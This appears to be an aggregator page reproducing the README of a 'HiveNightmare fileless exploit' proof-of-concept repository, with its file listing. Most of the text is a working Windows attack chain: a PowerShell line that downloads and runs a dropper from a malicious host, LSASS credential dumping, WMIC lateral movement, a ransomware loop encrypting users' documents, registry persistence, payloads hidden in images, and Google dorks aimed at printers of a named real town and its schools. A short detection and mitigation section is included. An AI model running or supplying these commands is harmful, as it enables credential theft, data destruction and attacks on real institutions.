来源

关联漏洞

描述

PoC malware that uses exploit CVE-2021-36934 (improper ACLs on shadow copies) using a fileless red team method on Windows 10/11 with LOLBins, extracting SYSTEM and SAM hives for local NTLM hashes. 

介绍

# HiveNightmare 'Fileless' Exploit PoC:

![Screenshot 2025-05-21 001453](https://github.com/user-attachments/assets/15ccb34b-483d-497a-8fa9-70f0f61232d6)

---

## Table of Contents

- [Overview](#overview)
- [Features](#features)
- [Lab Simulation Example](#lab-simulation-example)
- [Reconnaissance with Google Dorks](#reconnaissance-with-google-dorks)
- [LOLBins Overview](#lolbins-overview)
- [Fileless Dropper Embedding](#fileless-dropper-embedding)
- [Exploiting Print Spooler & HiveNightmare](#exploiting-print-spooler--hivenightmare)
- [Reflective DLL Injection](#reflective-dll-injection)
- [MITRE ATT&CK Mapping](#mitre-attck-mapping)
- [Detection & Mitigation](#detection--mitigation)
- [Legal Disclaimer](#legal-disclaimer)
- [References & Further Reading](#references--further-reading)

---

## Overview

**CVE-2021-36934/HiveNightmare** is an educational red/purple team research project that simulates a **fileless malware** attack framework on **Windows 11**. It enables the emulation of real-world adversary kill chains using [MITRE ATT&CK](https://attack.mitre.org/) techniques, with a focus on stealthy, fileless operations.

> **Warning:** For research and training in isolated labs only. **Do not use on production or unauthorized systems.**

---

## Features

- Simulates end-to-end fileless ransomware/wiperware attacks
- Demonstrates use of Living Off the Land Binaries (LOLBins)
- Showcases credential access, privilege escalation, lateral movement, and persistence
- Contains practical lab and reconnaissance examples
- Maps to MITRE ATT&CK for blue team detection exercises

---

## Lab Simulation Example

The following PowerShell simulation demonstrates a typical fileless ransomware attack chain using built-in Windows tools (LOLBins):

```powershell
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]::Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"
```

---

## Reconnaissance with Google Dorks

**Example Objective:** Identify publicly exposed printer services in Moberly, Missouri, potentially vulnerable to exploits like PrintNightmare.

**Sample Google Dork Queries:**

```
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"
```

---

## LOLBins Overview

**Living Off the Land Binaries (LOLBins)** are legitimate, trusted Windows binaries commonly abused by adversaries to bypass security controls and run malicious code filelessly.

**Example Use (Print Service Attack):**

```cmd
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry
```

> Attackers use LOLBins like `rundll32.exe`, `regsvr32.exe`, and `powershell.exe` to execute payloads from network shares, often after identifying exposed printers or servers via reconnaissance.

---

## Fileless Dropper Embedding

**Goal:** Deliver payloads covertly by embedding archives within images and extracting them using native tools.

**Steps:**

1. **Embed Payload:**
   ```bash
   copy /b nsfw.jpg + payload.7z nsfw.jpg
   ```

2. **Extract & Decode:**
   ```cmd
   certutil -decode nsfw.jpg dropper.7z
   7z x dropper.7z -oC:\Users\Public\
   ```

> This method bypasses traditional file extension filtering and leverages built-in tools for evasive delivery.

---

## Reflective DLL Injection

**Technique:** Load and execute a malicious DLL directly in memory using reflective loading.

**Example:**
```cmd
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry
```

> This enables stealthy, in-memory execution without leaving artifacts on disk.

---

## MITRE ATT&CK Mapping

| Phase                | Technique                               | ID                   | Description                                              |
|----------------------|-----------------------------------------|----------------------|----------------------------------------------------------|
| Initial Access       | Valid Accounts / Drive-by Compromise    | T1078, T1189         | Compromising public-facing print interfaces              |
| Execution            | DLL Side-Loading / LOLBins              | T1218, T1055.001     | Running DLLs reflectively via trusted binaries           |
| Privilege Escalation | Print Spooler Exploits / Hive ACL Abuse | T1068, T1003.002     | SYSTEM-level access and SAM hash extraction              |
| Defense Evasion      | Fileless Execution / Obfuscated Files   | T1027, T1202         | Encoded payloads delivered via certutil, mshta, etc.     |
| Credential Access    | LSASS Dumping / SAM Hive Access         | T1003                | Credential dumping post HiveNightmare                    |
| Lateral Movement     | SMB/Net Share Enumeration               | T1021.002            | Spread via printer shares or spooler enumeration         |
| Impact               | Data Destruction / Encryption           | T1485, T1486         | Fileless wiperware triggered via DLL payloads            |

---

## Detection & Mitigation

### Detection

- **Sysmon + Sigma Rules:**
  - Monitor `rundll32.exe` loading non-system DLLs
  - Watch for abnormal use of `certutil.exe`, `regsvr32.exe`, `mshta.exe`
  - Track shadow volume access by non-admins

- **SIEM Examples (ELK/Splunk):**
  - Alerts on execution from public shares
  - Parent/child process anomalies (e.g., `explorer.exe` spawning `rundll32.exe`)
  - Suspicious encoded commands in PowerShell or CMD

### Mitigation

- Disable Print Spooler where not needed:
  ```cmd
  Stop-Service -Name Spooler -Force
  Set-Service -Name Spooler -StartupType Disabled
  ```
- Apply all security patches and harden ACLs
- Block or restrict LOLBins with AppLocker or WDAC
- Use EDR solutions that detect reflective DLL loading and in-memory attacks

---

## Legal Disclaimer

> **All content, code, and techniques in this repository are for educational and authorized penetration testing only. Do not use any part of this project outside of controlled, isolated environments and without explicit permission. The authors assume no liability for misuse.**

---

## References & Further Reading

- [LOLOL Farm – LOLBin Playground](https://lolol.farm/)
- [LOLGEN – Generate LOLBin Chains](https://lolgen.hdks.org/)
- [Detecting SeriousSam](https://medium.com/@mvelazco/detecting-serioussam-cve-2021-36934-with-splunk-855dcbb10076)
- [DLL Injection Primer](https://www.crow.rip/crows-nest/mal/dev/inject/dll-injection)
- [Print Spooler Exploit Chain](https://itm4n.github.io/printnightmare-not-over/)
- [Fileless Malware – Wikipedia](https://en.wikipedia.org/wiki/Fileless_malware)
- [PrintSpoofer (Original)](https://github.com/itm4n/PrintSpoofer/tree/master)
- [HiveNightmare](https://github.com/GossiTheDog/HiveNightmare)
- [Mitre Attck T1055](https://attack.mitre.org/techniques/T1055/001/)
- [Hivenightmare demo](https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5)

---

**Stay safe, research responsibly, and always use in a legal and ethical manner.**

文件快照

 [4.0K]  /data/pocs/34f213a244a2b70b450ce8e6df554865b22fda04
├── [4.0K]  core
│   ├── [ 219]  build_sfx.ps1
│   ├── [ 787]  build_windows.bat
│   ├── [  59]  config.txt
│   ├── [4.0K]  nightmare
│   │   ├── [6.1K]  dll_inject.cpp
│   │   ├── [ 925]  dllmain.cpp
│   │   ├── [ 154]  framework.h
│   │   ├── [6.0K]  hive_nightmare.cpp
│   │   ├── [4.0K]  include
│   │   │   ├── [ 659]  data_wipe.h
│   │   │   ├── [3.1K]  defines.h
│   │   │   ├── [2.9K]  devhook.h
│   │   │   ├── [ 983]  device_io.h
│   │   │   ├── [ 794]  fast_crypt.h
│   │   │   ├── [ 501]  misc.h
│   │   │   ├── [ 771]  misc_mem.h
│   │   │   ├── [505K]  ntifs.h
│   │   │   └── [ 219]  prng.h
│   │   ├── [8.4K]  nightmare.vcxproj
│   │   ├── [1.3K]  nightmare.vcxproj.filters
│   │   ├── [ 168]  nightmare.vcxproj.user
│   │   ├── [4.3K]  nsfw.cpp
│   │   ├── [ 694]  nsfw.h
│   │   ├── [ 191]  pch.cpp
│   │   ├── [ 576]  pch.h
│   │   └── [4.0K]  x64
│   │       ├── [4.0K]  Debug
│   │       │   ├── [ 62K]  nightmare.dll
│   │       │   └── [1.6M]  nightmare.pdb
│   │       └── [4.0K]  Release
│   │           ├── [102K]  nightmare.dll
│   │           └── [4.1M]  nightmare.pdb
│   └── [1.4K]  nightmare.sln
├── [177K]  dropper.pdf
├── [4.0K]  lab
│   ├── [4.0K]  atomic red
│   │   ├── [1.3K]  run_tests.py
│   │   └── [4.0K]  tests
│   │       └── [1.7K]  hive_nightmare.yml
│   ├── [4.0K]  caldera
│   │   ├── [ 799]  deploy_caldera.sh
│   │   └── [4.0K]  plugin
│   │       └── [ 320]  songbird.yaml
│   ├── [4.0K]  docs
│   │   ├── [162K]  13007-reflective-dll-injection.pdf
│   │   ├── [ 72K]  Fileless-malware-Matko-Antun-Bekavac.pdf
│   │   └── [1.5M]  hivenightmare-aka-serious-sam-cve-2021-36934.pdf
│   ├── [4.0K]  logs
│   │   └── [1.0K]  export_logs.ps1
│   ├── [4.0K]  lolbins
│   │   ├── [3.1K]  attempted_credential_dump_from_registry_via_reg_exe.yml
│   │   ├── [3.3K]  certutil_download_with_urlcache_and_split_arguments.yml
│   │   ├── [3.5K]  certutil_with_decode_argument.yml
│   │   ├── [1.8K]  command_and_control_certutil_network_connection.toml
│   │   ├── [1.5K]  credential_access_dump_registry_hives.toml
│   │   ├── [1.6K]  defense_evasion_suspicious_certutil_commands.toml
│   │   ├── [1.9K]  defense_evasion_unusual_network_connection_via_rundll32.toml
│   │   ├── [1.6K]  Netsh.yml
│   │   ├── [1.8K]  powershell.yml
│   │   ├── [1.3K]  proc_creation_win_certutil_download.yml
│   │   ├── [1.2K]  proc_creation_win_certutil_encode.yml
│   │   ├── [ 610]  proc_creation_win_lolbin_pktmon.yml
│   │   ├── [1.0K]  proc_creation_win_netsh_helper_dll_persistence.yml
│   │   ├── [2.1K]  proc_creation_win_reg_dumping_sensitive_hives.yml
│   │   ├── [1.1K]  proc_creation_win_regedit_import_keys_ads.yml
│   │   ├── [1.2K]  proc_creation_win_regedit_import_keys.yml
│   │   ├── [3.9K]  proc_creation_win_rundll32_susp_activity.yml
│   │   ├── [2.1K]  processes_created_by_netsh.yml
│   │   ├── [2.7K]  processes_launching_netsh.yml
│   │   ├── [3.9K]  Rundll32.yml
│   │   ├── [1.7K]  Schtasks.yml
│   │   ├── [2.3K]  Sc.yml
│   │   ├── [ 14K]  the_lolbas_project.json
│   │   └── [117K]  The_LOLBAS_Project.svg
│   ├── [4.0K]  loldrivers
│   │   ├── [611K]  275c80c5-a67c-4536-b29e-4e481242cb01.md
│   │   └── [283K]  275c80c5-a67c-4536-b29e-4e481242cb01.yaml
│   ├── [1.9K]  mitigation.ps1
│   └── [2.3K]  rundll32_dump.txt
├── [1.1K]  LICENSE
└── [8.3K]  README.md

15 directories, 67 files

备注